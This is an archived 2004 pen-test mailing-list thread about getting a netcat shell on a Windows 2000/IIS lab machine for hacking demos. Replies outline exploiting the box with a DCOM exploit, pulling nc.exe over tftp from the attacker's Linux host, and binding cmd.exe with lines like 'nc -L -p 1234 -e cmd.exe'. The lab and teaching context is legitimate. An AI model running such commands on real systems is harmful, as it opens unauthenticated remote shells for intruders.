Re: Hacking Demo and Test Lab

From: Martin Wasson (martin_wasson_at_mastercard.com)
Date: 06/15/04

Next message: Jonathan Pokrzyk: "RE: Nmap results in spread*** format"

Previous message: Eric Paynter: "Re: Nmap results in spread*** format"
Maybe in reply to: raza sharif: "Hacking Demo and Test Lab"
Next in thread: Alberto Gonzalez: "Re: Hacking Demo and Test Lab"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Mr Harry!" <harry0@btopenworld.com>
Date: Tue, 15 Jun 2004 11:47:11 -0500

Harry,

>> To use netcat in this way the command is
>>
>> nc -L -e cmd.exe -p 23
>>
>> not nc -L -p 1234 -e cmd.exe as has been suggested.

You're joking, right? You're trying to bait me, aren't you? You don't
REALLY want me to believe that you think that options and their arguments
have to go in a specific order... as has been suggested, right? That would
be like telling him that he should use "ls -al" because "ls -la" won't
work, or that "nmap -T0 -A x.x.x.x" won't work, because it's supposed to
be "nmap -A -T0 x.x.x.x"? Because all you did was change the order, and
have netcat bound to a reserved port. Nice try, but I know you know better
than that, so I'm not going rib you about this being your first day. Heh
heh. One might argue the use of the default telnet port, as netcat
performs no authentication before allowing system access. Indeed, there is
life beyond readme.txt.

Marty Wasson, CISSP, CEH, IAM
Sr. Information Security Analyst
Global Information Security
MasterCard International
(636) 722-2372
martin_wasson@mastercard.com

"Men occasionally stumble over the truth, but most of them pick themselves
up and hurry off as if nothing ever happened." Winston Churchill

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CONFIDENTIALITY NOTICE
This E-mail message and any documents which accompany it are intended only
for the use of the individual or entity to which addressed, and may contain
information that is privileged, confidential or exempt from disclosure
under applicable law. If the reader is not the intended recipient, any
disclosure, distribution or other use of this E-mail message is prohibited.
If you have received this E-mail message in error, please notify the sender
immediately. Thank you.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

                      "Mr Harry!"
                      <harry0@btopenwor To: <pen-test@securityfocus.com>
                      ld.com> cc: (bcc: Martin Wasson/STL/MASTERCARD)
                                               Subject: Re: Hacking Demo and Test Lab
                      06/11/2004 04:35
                      PM

To use netcat in this way the command is

nc -L -e cmd.exe -p 23

not nc -L -p 1234 -e cmd.exe as has been suggested.

The break down of it is nc = netcat -L = listen (you can put -d =
stealth mode after this) -e = execute cmd.exe = the program you want to
execute -p = port !

So its listen for a connection and execute comand.exe when someone
connects on port 23!

All you have to do is telnet <ip of box with netcat> and voilla!
----- Original Message -----
From: "Martin Wasson" <martin_wasson@mastercard.com>
To: "raza sharif" <raza@raza.demon.co.uk>
Cc: <pen-test@securityfocus.com>
Sent: Friday, June 11, 2004 4:33 PM
Subject: Re: Hacking Demo and Test Lab

>
>
>
>
>
> Raza,
> A few things. I wouldn't really call this advanced. Why are you hacking
> from XP instead of Linux? Get yourself a Linux box. These exploits of
> which you write do not spawn shells using netcat. Netcat can bind shells
> after you install it. You have to pop the Win2k box first, with
something
> like oc192-dcom.c. This exploit will get you a shell, then have it GET
> (tftp) the files (like netcat) from your Linux box. Once the win2k box
has
> received nc.exe, run "nc -L -p 1234 -e cmd.exe" AFTER you've started
netcat
> on you Linux box (nc <win2k IP> 1234).
>
> Does that help?
>
> Regards,
>
>
>
> Marty Wasson, CISSP, CEH, IAM
> Sr. Information Security Analyst
> Global Information Security
> MasterCard International
> (636) 722-2372
> martin_wasson@mastercard.com
>
> "Men occasionally stumble over the truth, but most of them pick
themselves
> up and hurry off as if nothing ever happened." Winston Churchill
>
>
--------------------------------------------------------------------------
----------------------------------------------------------------------------

--------------------------------------------------------------
>
> CONFIDENTIALITY NOTICE
> This E-mail message and any documents which accompany it are intended
only
> for the use of the individual or entity to which addressed, and may
contain
> information that is privileged, confidential or exempt from disclosure
> under applicable law. If the reader is not the intended recipient, any
> disclosure, distribution or other use of this E-mail message is
prohibited.
> If you have received this E-mail message in error, please notify the
sender
> immediately. Thank you.
>
--------------------------------------------------------------------------
----------------------------------------------------------------------------

--------------------------------------------------------------
>
>
>
> raza sharif
> <raza@raza.demon. To:
pen-test@securityfocus.com
> co.uk> cc: (bcc: Martin
Wasson/STL/MASTERCARD)
> Subject: Hacking Demo and
Test Lab
> 06/11/2004 06:41
> AM
>
>
>
>
>
>
>
>
> Hi Folks ,
>
>
>
> Im doing some advanced Hacking Demos for management and also Corporates
> etc.
>
>
>
> I have a installed windows 2000 server and iis 5.0 on VMWARE GSX server.
>
>
>
> Im using Webdav and other exploits that all basically should spawn a
shell
> using netcat.
>
>
>
> Im using XP as my attacking machine.
>
>
>
> Prob at the moment is Netcat will not spawn a shell regardless of what i
> try.
>
>
>
> Any ideas ? i checked the install it is windows 2000 500.1295 no
reference
> to service packs etc. it's a default install.
>
>
>
> Also what are good demo's etc to run to show real hacking on windows 2000
,
> iis etc..that i can get to work
>
>
>
> thanks
>
>
>
> Raza
>
>
>
> Raza@raza.demon.co.uk
>
>
>
>
>
> -----------------------------------------
> CONFIDENTIALITY NOTICE
> This e-mail message and any attachments are only for the use of the
intended recipient and may contain information that is privileged,
confidential or exempt from disclosure under applicable law. If you are
not
the intended recipient, any disclosure, distribution or other use of this
e-mail message or attachments is prohibited. If you have received this
e-mail message in error, please delete and notify the sender immediately.
Thank you.

-----------------------------------------
CONFIDENTIALITY NOTICE
This e-mail message and any attachments are only for the use of the intended recipient and may contain information that is privileged, confidential or exempt from disclosure under applicable law. If you are not the intended recipient, any disclosure, distribution or other use of this e-mail message or attachments is prohibited. If you have received this e-mail message in error, please delete and notify the sender immediately. Thank you.

Next message: Jonathan Pokrzyk: "RE: Nmap results in spread*** format"

Previous message: Eric Paynter: "Re: Nmap results in spread*** format"
Maybe in reply to: raza sharif: "Hacking Demo and Test Lab"
Next in thread: Alberto Gonzalez: "Re: Hacking Demo and Test Lab"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]